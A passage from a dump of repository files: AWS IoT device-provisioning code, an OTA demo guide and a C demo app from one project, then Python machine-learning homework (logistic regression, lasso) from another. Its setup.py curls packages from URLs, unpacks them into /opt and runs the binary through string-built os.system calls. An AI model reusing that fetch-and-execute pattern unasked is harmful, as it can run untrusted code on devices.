service\");\n\n log.debug(String.format(\"fetching certificate %s ...\", certId));\n\n DescribeCertificateRequest req = new DescribeCertificateRequest();\n req.setCertificateId(certId);\n DescribeCertificateResult describeCertificateResult = iotClient.describeCertificate(req);\n CertificateDescription certDesc = describeCertificateResult.getCertificateDescription();\n\n PrintWriter out = new PrintWriter(certFilePath);\n out.print(certDesc.getCertificatePem());\n out.close();\n\n log.info(String.format(\"the IoT device certificate %s is downloaded at %s, status: %s\",\n certId, certFilePath, certDesc.getStatus()));\n\n String fileName = String.format(\"nw-app-ota-demo/%s\", ROOT_CA_NAME);\n URL rootCa = getClass().getClassLoader().getResource(fileName);\n if (rootCa == null)\n throw new IllegalArgumentException(\n String.format(\"root CA certificate file %s not found\", fileName));\n\n out = new PrintWriter(rootCaPath);\n out.print(new String(rootCa.openStream().readAllBytes()));\n out.close();\n\n log.info(String.format(\"the IoT device root CA certificate is generated at %s\", rootCaPath));\n\n fileName = String.format(\"nw-app-ota-demo/%s.key\", PUB_KEY_NAME);\n URL key = getClass().getClassLoader().getResource(fileName);\n if (key == null)\n throw new IllegalArgumentException(String.format(\"private key file %s not found\", fileName));\n\n out = new PrintWriter(publicKeyPath);\n out.print(new String(key.openStream().readAllBytes()));\n out.close();\n\n log.info(String.format(\"the IoT device public key is generated at %s\", publicKeyPath));\n\n fileName = String.format(\"nw-app-ota-demo/%s.key\", PRV_KEY_NAME);\n key = getClass().getClassLoader().getResource(fileName);\n if (key == null)\n throw new IllegalArgumentException(String.format(\"private key file %s not found\", fileName));\n\n out = new PrintWriter(privateKeyPath);\n out.print(new String(key.openStream().readAllBytes()));\n out.close();\n\n log.info(String.format(\"the IoT device private key is generated at %s\", privateKeyPath));\n }\n\n private String prepareCredentials(String certId) throws IOException {\n String credentialsPath = String.format(\"%s/target/app-ota-demo/credentials\",\n System.getProperty(\"user.dir\"));\n\n File credentialsPathFile = new File(credentialsPath);\n FileUtils.deleteDirectory(credentialsPathFile);\n boolean ok = credentialsPathFile.mkdirs();\n if (!ok)\n throw new IOException(\n String.format(\"failed to create IoT device credentials directory at %s\", credentialsPath));\n\n String certFilePath = String.format(\"%s/cert.pem\", credentialsPath);\n String rootCaPath = String.format(\"%s/root-ca.crt\", credentialsPath);\n String publicKeyPath = String.format(\"%s/public.key\", credentialsPath);\n String privateKeyPath = String.format(\"%s/private.key\", credentialsPath);\n\n this.generateCredentials(certId, certFilePath, rootCaPath, publicKeyPath, privateKeyPath);\n\n List<String> srcFiles = Arrays.asList(certFilePath, rootCaPath, publicKeyPath, privateKeyPath);\n String zipFilePath = String.format(\"%s/%s\", credentialsPath, CREDENTIALS_FILE_NAME);\n FileOutputStream fos = new FileOutputStream(zipFilePath);\n ZipOutputStream zipOut = new ZipOutputStream(fos);\n\n for (String srcFile : srcFiles) {\n File fileToZip = new File(srcFile);\n FileInputStream fis = new FileInputStream(fileToZip);\n ZipEntry zipEntry = new ZipEntry(fileToZip.getName());\n zipOut.putNextEntry(zipEntry);\n\n byte[] bytes = new byte[1024];\n int length;\n while ((length = fis.read(bytes)) >= 0) {\n zipOut.write(bytes, 0, length);\n }\n fis.close();\n }\n\n zipOut.close();\n fos.close();\n\n log.info(String.format(\"the credentials package of the IoT device are prepared at %s\", zipFilePath));\n\n return zipFilePath;\n }\n\n private String prepareNightsWatchRangerPackage() throws IOException {\n String packageDstPath = String.format(\"%s/target/nightswatch-ranger\",\n System.getProperty(\"user.dir\"));\n\n File packageDstPathFile = new File(packageDstPath);\n FileUtils.deleteDirectory(packageDstPathFile);\n boolean ok = packageDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\n \"failed to create IoT device Night's Watch - Ranger package directory at %s\", packageDstPath));\n\n String packageDstFilePath = String.format(\"%s/%s\", packageDstPath, RANGER_PKG_FILE_NAME);\n\n String packageSrcFileName = String.format(\"nightswatch-ranger_x64/%s\", RANGER_PKG_FILE_NAME);\n URL packageSrc = getClass().getClassLoader().getResource(packageSrcFileName);\n if (packageSrc == null)\n throw new IllegalArgumentException(\n String.format(\"Night's Watch - Ranger package file %s not found\", packageSrcFileName));\n\n FileOutputStream out = new FileOutputStream(packageDstFilePath);\n out.write(packageSrc.openStream().readAllBytes());\n out.close();\n\n log.info(String.format(\n \"the Night's Watch - Ranger package of the IoT device are prepared at %s\", packageDstFilePath));\n\n return packageDstFilePath;\n }\n\n private String prepareSetupScript(String preSignedCredentialsPackageURL,\n String preSignedRangerPackageURL) throws IOException {\n String scriptDstPath = String.format(\"%s/target/app-ota-demo/setup-script\",\n System.getProperty(\"user.dir\"));\n\n File scriptDstPathFile = new File(scriptDstPath);\n FileUtils.deleteDirectory(scriptDstPathFile);\n boolean ok = scriptDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\n \"failed to create IoT device setup script directory at %s\", scriptDstPath));\n\n String scriptDstFilePath = String.format(\n \"%s/%s\", scriptDstPath, AppOTADemoDeviceStack.SETUP_SCRIPT_FILE_NAME);\n\n String scriptSrcFileName = String.format(\n \"nw-app-ota-demo/%s\", AppOTADemoDeviceStack.SETUP_SCRIPT_FILE_NAME);\n URL scriptSrc = getClass().getClassLoader().getResource(scriptSrcFileName);\n if (scriptSrc == null)\n throw new IllegalArgumentException(\n String.format(\"setup script file %s not found\", scriptSrcFileName));\n\n String script = new String(scriptSrc.openStream().readAllBytes());\n\n script = script.replace(\"<CREDENTIALS_PACKAGE_URL>\", preSignedCredentialsPackageURL);\n script = script.replace(\"<NW_RANGER_PACKAGE_URL>\", preSignedRangerPackageURL);\n\n PrintWriter out = new PrintWriter(scriptDstFilePath);\n out.print(script);\n out.close();\n\n log.info(String.format(\"setup script of the IoT device are prepared at %s\", scriptDstFilePath));\n\n return scriptDstFilePath;\n }\n\n private void deactivateThingCert(String certId) {\n AWSIot iotClient = AWSIotClientBuilder.defaultClient();\n log.debug(\"connected to AWS IoT service\");\n\n // Deactivate three certificates\n // CLI: aws iot update-certificate --new-status INACTIVE --certificate-id <certificate_id>\n UpdateCertificateRequest req = new UpdateCertificateRequest();\n req.setCertificateId(certId);\n req.setNewStatus(\"INACTIVE\");\n iotClient.updateCertificate(req);\n\n log.info(String.format(\"the certificate %s is deactivated\", certId));\n }\n\n private void deleteJobs() {\n // delete the potential existing jobs might related to the thing\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V1_DEPLOY_JOB_ID);\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V2_DEPLOY_JOB_ID);\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V1_DESTROY_JOB_ID);\n this.jobDeleter.deleteJob(this.log, AppOTADemoApplication.APP_V2_DESTROY_JOB_ID);\n }\n}\n"
},
{
"alpha_fraction": 0.6622922420501709,
"alphanum_fraction": 0.6710411310195923,
"avg_line_length": 25.581396102905273,
"blob_id": "62418747999b7b11314ea2e82c190d7b1f922181",
"content_id": "78323a0199d9827e25e2140f529a1e26ad2bebd7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1143,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 43,
"path": "/src/main/resources/nw-app-ota-demo/setup.py",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\n\n# both two will be injected by Night's Watch - Builder, DON\"T edit manually.\ncredentials_pkg_url = \"<CREDENTIALS_PACKAGE_URL>\"\nnw_ranger_pkg_url = \"<NW_RANGER_PACKAGE_URL>\"\n\n# step1, download asset\n\ncredentials_pkg_path = \"/tmp/credentials.zip\"\nnw_ranger_pkg_path = \"/tmp/nightswatch-ranger.tar.gz\"\nnw_ranger_home = \"/opt/nightswatch-ranger\"\n\n# download device root CA, certificates and keys\nrc = os.system(\"curl -o %s -fs '%s'\" % (credentials_pkg_path, credentials_pkg_url))\nif 0 != rc:\n sys.exit(rc)\n\n# download Night's Watch - Ranger package\nrc = os.system(\"curl -o %s -fs '%s'\" % (nw_ranger_pkg_path, nw_ranger_pkg_url))\nif 0 != rc:\n sys.exit(rc)\n\n# step2, install asset\n\n# un-package Night's Watch - Ranger package\nrc = os.system(\"tar zxf %s --no-same-owner -C /opt\" % nw_ranger_pkg_path)\nif 0 != rc:\n sys.exit(rc)\n\n# copy device root CA, certificates and keys\nrc = os.system(\"unzip -o %s -d %s/certs/p1\" % (credentials_pkg_path, nw_ranger_home))\nif 0 != rc:\n sys.exit(rc)\n\n# step3, launch Ranger daemon\n\nbin = \"%s/ranger\" % nw_ranger_home\nos.execl(bin, bin)\n"
},
{
"alpha_fraction": 0.5490887761116028,
"alphanum_fraction": 0.5737801194190979,
"avg_line_length": 24.75757598876953,
"blob_id": "4c059c0a94eb1cac30f213db77c879b9625dc66f",
"content_id": "5fedcf8dddb414c6ddcb99228fbef8d32508660e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1701,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 66,
"path": "/demo/app_xxx_src/app_xxx.c",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "#include <signal.h>\n#include <sys/socket.h>\n#include <linux/limits.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <netdb.h>\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <errno.h>\n#include <arpa/inet.h> \n\n\nvoid sig_handler(int signo)\n{\n exit(0);\n}\n\nint main(int argc, char *argv[])\n{\n int sockfd = 0, n = 0, app_name_l = 0, topic_l = 0;\n char app_name[PATH_MAX + 1], topic[PATH_MAX + 50];\n struct sockaddr_in serv_addr; \n// char *data = \"{\\\"payload\\\": \\\"*,*,red\\\"}\\n\",\n char *data = \"*,*,red\\n\",\n *log = \"LOG: send data to IoT Core successfully.\\n\",\n conn_err[256], sock_err[256];\n\n// signal(SIGINT, sig_handler);\n\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\n if (-1 == sockfd) {\n snprintf(sock_err, 256, \"LOG: failed to create socket fd: %d.\\n\", errno);\n write(2, sock_err, strlen(sock_err));\n return 1;\n }\n\n memset(&serv_addr, '\\0', sizeof(serv_addr)); \n\n serv_addr.sin_family = AF_INET;\n serv_addr.sin_port = htons(9000); \n\n inet_pton(AF_INET, argv[1], &serv_addr.sin_addr);\n\n if (-1 == connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))) {\n snprintf(conn_err, 256, \"LOG: failed to connect to IPC server: %d.\\n\", errno);\n write(2, conn_err, strlen(conn_err));\n return 1;\n }\n\n app_name_l = snprintf(app_name, PATH_MAX + 1, \"%s\\n\", argv[2]);\n write(sockfd, app_name, app_name_l);\n\n topic_l = snprintf(topic, PATH_MAX + 50, \"%s\\n\", argv[3]);\n write(sockfd, topic, topic_l);\n\n while (1)\n {\n write(sockfd, data, strlen(data));\n write(1, log, strlen(log));\n sleep(5);\n } \n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7354457378387451,
"alphanum_fraction": 0.7471194863319397,
"avg_line_length": 62.42307662963867,
"blob_id": "bec89f9f503fdafe50cbf015ef41c3b8e0939f0a",
"content_id": "601cefa6203d0af3b69d10616c9f07ce578cebdf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6596,
"license_type": "permissive",
"max_line_length": 343,
"num_lines": 104,
"path": "/demo/app-ota.md",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "This document means to give you a guide to produce an easy-to-show demonstration about application OTA based on Night's Watch project.\n\n## 0. Pre-condition\n\n1. Match the requirements listed in README [limit](http://git.awsrun.com/rp/nightswatch-builder#limit) section.\n2. You need a local laptop/PC as the client to run AWS CLI command with your AWS credentials as well as certain rights.\n3. You need a local laptop/PC as the client to run Night's Watch - Build program with your AWS credentials as well as certain rights.\n\n>>**Note:**\n>>\n>> Night's Watch - Build does not require user input any AWS credentials, instead, the default configuration and credentials will be loaded from ``~/.aws/config`` and ``~/.aws/credentials`` automatically, , you can configure them by command ``aws configure``.\n\n## 1. Deploy IoT core stack\n\n>>**Note:**\n>>\n>> All `cdk` and `java` command listed in this guide need you to change current working directory to Night's Watch - Builder code repository directory first.\n\n- Cleanup last context of CDK\n\n - ``cdk context --clear``\n\n- Provision IoT core stack\n\n - ``cdk deploy nightswatch-app-ota-demo-iot``\n\n- Prepare Night's Watch - Ranger package\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo service-endpoint``\n - You will get `IoT service endpoint` output by above step, update `AWS_IOT_MQTT_HOST` value in [`aws_iot_config.h`](http://git.awsrun.com/rp/nightswatch-ranger/blob/master/aws_iot_config.h#L15) in Night's Watch - Ranger code repository follow [this step](http://git.awsrun.com/rp/nightswatch-ranger#device-client-parameter-configuration).\n - Build Night's Watch - Ranger follow [this step](http://git.awsrun.com/rp/nightswatch-ranger#basic) on a x64 architecture host.\n - Organize Night's Watch - Ranger deployment directory by [this step](http://git.awsrun.com/rp/nightswatch-ranger#deployment-directory-structure). Note, you need to name the deployment directory `<NIGHTS_WATCH_RANGER_HOME_DIR>` to `nightswatch-ranger`.\n - Package Night's Watch - Ranger deployment by command ``tar czf nightswatch-ranger.tar.gz nightswatch-ranger``.\n - Save the tar ball to `src/main/resources/nightswatch-ranger_x64` directory.\n\n- Re-build Night's Watch - Builder to update inline resource\n\n - ``mvn package``\n\n- Prepare demo asset\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-asset``\n\n## 2. Create fake IoT device for demo if you have no an own device (optional)\n\n>>**Note:**\n>>\n>> You need an IoT thing to act the device to deploy the application and demo the OTA operation via Night's Watch - Ranger daemon program.\n>>\n>> Skip this step if you have a real one, you can get certificates and credentials in the S3 bucket (the bucket name is provided by output `nightswatch-app-ota-demo-iot.devfilesbucketname` after the stack deployment), then deploy and run Night's Watch - Ranger by yourself.\n>>\n>> If you do not have a x64 architecture device (current built-in demo application and containerization facility is x64 architecture), you can follow this step to deploy an EC2 instance to act the IoT device easily, Night's Watch - Builder will automatically deploy and configure Ranger for you.\n\n- ``cdk deploy nightswatch-app-ota-demo-dev [-c ec2-key-name=<key-pair-name>] [-c ec2-image-id=<ec2-image-id>]``\n\n - Use `ec2-image-id` optional parameter in above command to provide AMI ID to provision EC2 instance using an Ubuntu 18.04lts x64 operation system in your region, e.g. ID `ami-0cd744adeca97abb1` can be used for region `ap-northeast-1`. CDK will lookup an Amazon official AMI contains Ubuntu 18.04lts x64 for your by default.\n - Use `key-pair-name` optional parameter in above command to provide SSH key pair name to inject the public key to the EC2 instance, if you would like to use `ssh` login it, to debug or check log for example.\n\n## 3. Execute Application deployment and update job\n\n- For containerized application deployment and update:\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-app-v1``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 1.\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-app-v2``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 2.\n\n- For non-containerized application deployment and update:\n\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-native-app-v1``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 1.\n - ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo prepare-native-app-v2``\n - Execute ``aws iot create-job`` command provided by output `application deployment command line` from above step. This job is used to deploy application version 2.\n\n>>**The different between application version 1 and 2:**\n>>\n>> Application version 1 outputs data `*,*,red` to the MQTT topic `/qbr/demo/lcd` periodically.\n>>\n>> Application version 2 outputs data `*,*,yello` to the MQTT topic `/qbr/demo/lcd` periodically.\n>>\n>> Additional, you can subscribe the MQTT topic `nw/apps/app_xxx/event` and `nw/apps/app_xxx/log` to monitor application's common resource usage indicators and `stdout` `stderr` outputs.\n>\n>>**Application source code:**\n>>\n>> As the attachment for you reference, the source code have been updated to [here](http://git.awsrun.com/rp/nightswatch-builder/blob/master/demo/app_xxx_src).\n>> The `rootfs` of the container is not included.\n>\n>>**Note:**\n>>\n>> You can use follow commands to describe application deployment and update progress in detail:\n>> - ``aws iot describe-job-execution --job-id nw-app-ota-demo-deploy-app-v1 --thing-name nw-app-ota-demo-dev``\n>> - ``aws iot describe-job-execution --job-id nw-app-ota-demo-deploy-app-v2 --thing-name nw-app-ota-demo-dev``\n\n## -3. Clean demo asset up\n\n- ``java -jar target/nightswatch-builder-1.0-SNAPSHOT-jar-with-dependencies.jar app-ota-demo cleanup-asset``\n\n## -2. Delete demo IoT device if you created in step \\#2\n\n- ``cdk destroy nightswatch-app-ota-demo-dev``\n\n## -1. Destroy IoT core stack\n\n- ``cdk destroy nightswatch-app-ota-demo-iot``\n"
}
] | 7 |
feipenghe/ml_hw | https://github.com/feipenghe/ml_hw | ddfab6d2ada65610dff34eef2a2a225446888d6b | 77acc66edb845a46d833424d4930cedfa5a08324 | 2a9ff4354c158a0f5b58dc27e70174a9f15ecb72 | refs/heads/master | 2022-12-24T07:58:53.790642 | 2020-10-01T20:47:19 | 2020-10-01T20:47:19 | 300,409,806 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6086474657058716,
"alphanum_fraction": 0.6330376863479614,
"avg_line_length": 33.464969635009766,
"blob_id": "c52be04ef537abfb2f9b5e2f16bd6a4f3a607284",
"content_id": "ca8d23ab9daa18975569ec1b601f532f300a240e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5412,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 157,
"path": "/CSE546hw2/binary_logistic_reg_SGD.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom mnist import MNIST\nimport numpy as np\ndef load_dataset():\n mndata = MNIST(\"./data/python-mnist/data/\")\n \n X_train, labels_train = map(np.array, mndata.load_training())\n kept_entries_pos1 = (labels_train == 2) + (labels_train == 7)\n X_train = X_train[kept_entries_pos1]\n labels_train = labels_train[kept_entries_pos1]\n labels_train = labels_train.astype(int)\n labels_train[labels_train == 7] = 1\n labels_train[labels_train == 2] = -1\n\n \n \n X_test, labels_test = map(np.array, mndata.load_testing())\n kept_entries_pos2 = (labels_test == 2) + (labels_test == 7)\n X_test = X_test[kept_entries_pos2]\n labels_test = labels_test[kept_entries_pos2]\n labels_test = labels_test.astype(int)\n labels_test[labels_test == 7] = 1\n labels_test[labels_test == 2] = -1\n # normalization to [0,1]\n X_train = X_train/255.0 \n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\nX_train, labels_train, X_test, labels_test = load_dataset()\n\n\n# In[2]:\n\n\ndef SGD(X_train, labels_train, X_test, labels_test, batch_size = 100, learning_rate = 0.001, stop_b = 1e-4, stop_w= 1e-4):\n\n ##### import math\n n, d= X_train.shape\n\n m = X_test.shape[0]\n\n # w = np.zeros(d)\n new_w = np.zeros(d)\n w_gradient = np.zeros(d)\n # b = 0\n new_b = 0\n b_gradient = 0\n# learning_rate = 0.001\n\n reg_lambda = 1 \n reg_lambda = reg_lambda * (batch_size/n)\n loss_on_training = []\n loss_on_testing = []\n\n loss_sum = 0\n\n misclass_on_training = []\n misclass_on_testing = []\n\n\n\n # TODO: while not converge\n count = 0\n metStopCondition = False\n# batch_size = 1\n while not metStopCondition:\n\n w = np.copy(new_w)\n b = np.copy(new_b)\n\n idx = np.random.randint(0, n, batch_size)\n X_train_batch = X_train[idx]\n labels_train_batch = labels_train[idx]\n\n y_pred = b + X_train_batch.dot(w)\n u = 1/(1+ np.exp(-labels_train_batch*(y_pred)))\n w_gradient = (1/batch_size)*np.sum((1-u)*(-labels_train_batch*X_train_batch.T), axis = 1) + 2*reg_lambda*w\n\n b_gradient = (1/batch_size)*np.sum((1-u)*(-labels_train_batch))\n\n # gradient descent update on the whole dataset, therefore we don't have to update each step\n new_w -= w_gradient * learning_rate\n new_b -= b_gradient * learning_rate\n\n training_loss = (1/n) * np.sum( np.log(1+ np.exp(-labels_train*(b+X_train.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_training.append(training_loss)\n testing_loss = (1/m) * np.sum( np.log(1+ np.exp(-labels_test*(b+X_test.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_testing.append(testing_loss)\n\n num_incor_class_training = np.sum( labels_train !=( np.sign(b+ X_train.dot(w) ) ) ) \n num_incor_class_testing = np.sum( labels_test != ( np.sign(b + X_test.dot(w) ) ))\n# print(\"num_incor_class_training: \", num_incor_class_training)\n misclass_on_training.append( num_incor_class_training /n )\n misclass_on_testing.append(num_incor_class_testing/m)\n # print(new_w)\n # print(w)\n # break\n # print(\"new_b - b: \", type(new_b - b))\n # Stop condition check\n # 1e-7 2.5e-7\n metStopCondition = np.absolute(new_b - b) < stop_b and np.linalg.norm(new_w - w, 2) < stop_w\n# print(\"new_b - b\", new_b - b)\n# print(\"np.linalg.norm(new_w - w, 2) \", np.linalg.norm(new_w - w, 2) )\n# print(\"loss: \", loss_on_training[-1])\n return loss_on_training, loss_on_testing, misclass_on_training, misclass_on_testing\n\n\n# In[3]:\n\n\nloss_on_training1, loss_on_testing1, misclass_on_training1, misclass_on_testing1 = SGD(X_train, labels_train, X_test, labels_test, batch_size = 1,stop_b =6e-4 , stop_w = 2.5e-3)\n\nfrom matplotlib import pyplot as plt\n\nplt.plot(range(len(loss_on_training1)), loss_on_training1, label = \"training loss\")\nplt.plot(range(len(loss_on_training1)), loss_on_testing1,label = \"testing loss\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"loss\")\nplt.legend()\n# plt.show()\nplt.savefig(\"A6c(i)\")\nplt.show()\n\nplt.plot(range( len(misclass_on_training1)-1), misclass_on_training1[1:], label = \"misclassification rate on training dataset\")\nplt.plot(range(len(misclass_on_training1)-1), misclass_on_testing1[1:], label = \"misclassification rate on test dataset\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"misclassification rate\")\nplt.legend()\nplt.savefig(\"A6c(ii)\")\nplt.show()\n\n\n# In[4]:\n\n\nloss_on_training2, loss_on_testing2, misclass_on_training2, misclass_on_testing2 = SGD(X_train, labels_train, X_test, labels_test, batch_size = 100, learning_rate = 0.01,stop_b =1e-4 , stop_w = 4e-3)\n\nplt.plot(range(len(loss_on_training2)), loss_on_training2, label = \"training loss\")\nplt.plot(range(len(loss_on_training2)), loss_on_testing2,label = \"testing loss\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"loss\")\nplt.legend()\n# plt.show()\nplt.savefig(\"A6d(i)\")\nplt.show()\n\nplt.plot(range( len(misclass_on_training2)-1), misclass_on_training2[1:], label = \"misclassification rate on training dataset\")\nplt.plot(range(len(misclass_on_training2)-1), misclass_on_testing2[1:], label = \"misclassification rate on test dataset\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"misclassification rate\")\nplt.legend()\nplt.savefig(\"A6d(ii)\")\nplt.show()\n\n"
},
{
"alpha_fraction": 0.5818120837211609,
"alphanum_fraction": 0.6009043455123901,
"avg_line_length": 24.95652198791504,
"blob_id": "f18bd9db5497244c5cc829c5a695fd582271620a",
"content_id": "ca7155f892f83110929ae07ab56c3840ec5a7937",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5971,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 230,
"path": "/CSE546hw2/lasso_application.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[65]:\n\n\nimport numpy as np\ntrain_f = \"data/crime-train.txt\"\ntest_f = \"data/crime-test.txt\"\ndef txt2arr(file_name):\n var_d = dict()\n with open(file_name) as f:\n arr = []\n lines = f.readlines()\n variables = lines[0].split(\"\\t\")\n for i in range(len(variables)):\n var_d[variables[i]] = i\n\n for l in lines[1:]:\n l = l.strip()\n arr.append([float(s) for s in l.split(\"\\t\")])\n return np.array(arr), var_d\ntraining_data, var_d = txt2arr(train_f) \ntesting_data, _ = txt2arr(test_f)\n\ntrain_x = training_data[:, 1:]\ntrain_y = training_data[:, 0]\n\ntest_x = testing_data[:, 1:]\ntest_y = testing_data[:, 0]\nprint(train_y.shape)\nprint(train_x.shape)\n\n\n# In[26]:\n\n\nvar_d\n\n\n# In[25]:\n\n\nprint(train_y)\n\n\n# In[69]:\n\n\nn, d = train_x.shape\nm, _ = test_x.shape\nw = np.zeros(d)\n\n\n# In[71]:\n\n\n\n\n# TODO: regularization path\n# it updates values column by column and each time use all data\nimport sys\n\nreg_lambda_l = []\n\nfor k in range(d):\n reg_lambda = 2*np.abs(np.sum(train_x[:,k] *(train_y-np.average(train_y)) ,axis=0))\n reg_lambda_l.append(reg_lambda)\nreg_lambda = max(reg_lambda_l)\n\nreg_lambda0 = reg_lambda\nprint(\"max_lambda: \", reg_lambda)\n\n# initialize lambda\nnum_nonzero_l = []\nreg_lambda_l = []\nreg_lambda_l.append(reg_lambda)\n\nobjective_val_l = []\n\n\n\nw_updates = [np.zeros(d)] # initialize how much w_updates\nw = w_updates[0]\nsquared_train_err_l = [np.sum( (train_x.dot(w) + b - train_y)**2 )/n]\nsquared_test_err_l = [np.sum( (test_x.dot(w) + b - test_y)**2 )/m]\n# w_prev = np.zeros(d)\nb_l = [(1/n)*np.sum( train_y - train_x.dot(w))]\n\nsolution_weights = [np.zeros(d)]\n\n\n\n\nwhile reg_lambda > 1e-2: # TODO\n max_update = sys.maxsize\n # initialize weight with solution of lambda_max\n if reg_lambda == reg_lambda0:\n w_prev = np.zeros(d)\n else:\n w_prev = w_updates[1]\n w = w_prev\n b = b_l[-1]\n\n while max_update >= 0.01: # condition for not converge\n # pre-compute a\n # as a is fixed and solely depends on X\n a = 2*np.sum(train_x**2, axis = 0) # axis = 0 by default\n # print(a.shape)\n for k in range(d):\n excluded_train_x = np.delete(train_x, k, axis = 1)\n excluded_w = np.delete(w, k)\n # calculate the cost\n c_k = 2*np.sum(train_x[:,k]*(train_y- (b+ excluded_train_x.dot(excluded_w)) ) )\n # update weights\n if c_k < -reg_lambda:\n w[k]= (c_k+reg_lambda)/a[k]\n elif c_k > reg_lambda:\n w[k] = (c_k- reg_lambda)/a[k]\n else:\n w[k] = 0\n \n # sanity check\n obj_val = np.sum( (train_x.dot(w) + b - train_y)**2 )+ np.sum(reg_lambda * np.absolute(w))\n objective_val_l.append(obj_val)\n \n w_updates.append(np.array(w)) # append the updated w\n b = (1/n)*np.sum( train_y - train_x.dot(w))\n b_l.append(b)\n# print(w_updates)\n# print(b_l)\n if len(w_updates) > 2: # TODO: maximum \n print(\"w_updates \", len(w_updates))\n# print(\"w_update \", w - w_prev)\n# print(\"w_update: \", w_updates[-1]-w_updates[-3])\n max_update = np.max(w_updates[-1]-w_updates[-2])\n print(\"maximum update \", max_update)\n if max_update == 0: # skip zero weight matrix\n break\n w_prev = w\n \n \n solution_weights.append(w)\n # keep track of number of nonzero for each solution\n num_nonzero = np.sum(w != 0)\n num_nonzero_l.append(num_nonzero)\n \n \n # error record\n squared_train_err = np.sum( (train_x.dot(w) + b - train_y)**2 )/n\n squared_train_err_l.append(squared_train_err)\n squared_test_err = np.sum( (test_x.dot(w) + b - test_y)**2 )/m\n squared_test_err_l.append(squared_test_err)\n \n # regularization lambda\n reg_lambda = reg_lambda*0.5\n reg_lambda_l.append(reg_lambda)\n print(\"new lambda: \", reg_lambda)\n\n\n# In[23]:\n\n\n# sanity check continue\ncount = 0\nfor i in range(1,len(objective_val_l)):\n if objective_val_l[i-1] < objective_val_l[i]:\n count += 1\nprint(\"number of wrong optimization: \" , count)\nprint(objective_val_l)\n\n\n# In[34]:\n\n\nfrom matplotlib import pyplot as plt\nreg_lambda_0 = max(reg_lambda_l)\n\nplt.plot(reg_lambda_l[:-1], num_nonzero_l)\nplt.xscale(\"log\")\nplt.xlim(reg_lambda_0, 1e-2) \nplt.xlabel(\"reg_lambda\")\nplt.ylabel(\"number of nonzero\")\nplt.savefig(\"A5a\")\nplt.show()\n\n\n# In[79]:\n\n\ndef get_feature_weight_update(ws, feature, var_d):\n feature_updates = [w[var_d[feature]] for w in ws]\n return feature_updates\n \nvar_d[\"agePct12t29\"]\n\nvar_query = [\"agePct12t29\", \"pctWSocSec\", \"pctUrban\", \"agePct65up\",\"householdsize\"]\n\nfeature1_updates = get_feature_weight_update(solution_weights, var_query[0], var_d)\nfeature2_updates = get_feature_weight_update(solution_weights, var_query[1], var_d)\nfeature3_updates = get_feature_weight_update(solution_weights, var_query[2], var_d)\nfeature4_updates = get_feature_weight_update(solution_weights, var_query[3], var_d)\nfeature5_updates = get_feature_weight_update(solution_weights, var_query[4], var_d)\nplt.plot(reg_lambda_l, feature1_updates, label = \"agePct12t29\")\nplt.plot(reg_lambda_l, feature2_updates, label = \"pctWSocSec\")\nplt.plot(reg_lambda_l, feature3_updates, label = \"pctUrban\")\nplt.plot(reg_lambda_l, feature4_updates, label = \"agePct65up\")\nplt.plot(reg_lambda_l, feature5_updates, label = \"householdsize\")\nplt.xlabel(\"lambda\")\nplt.ylabel(\"feature weights\")\nplt.xlim(reg_lambda_l[0], 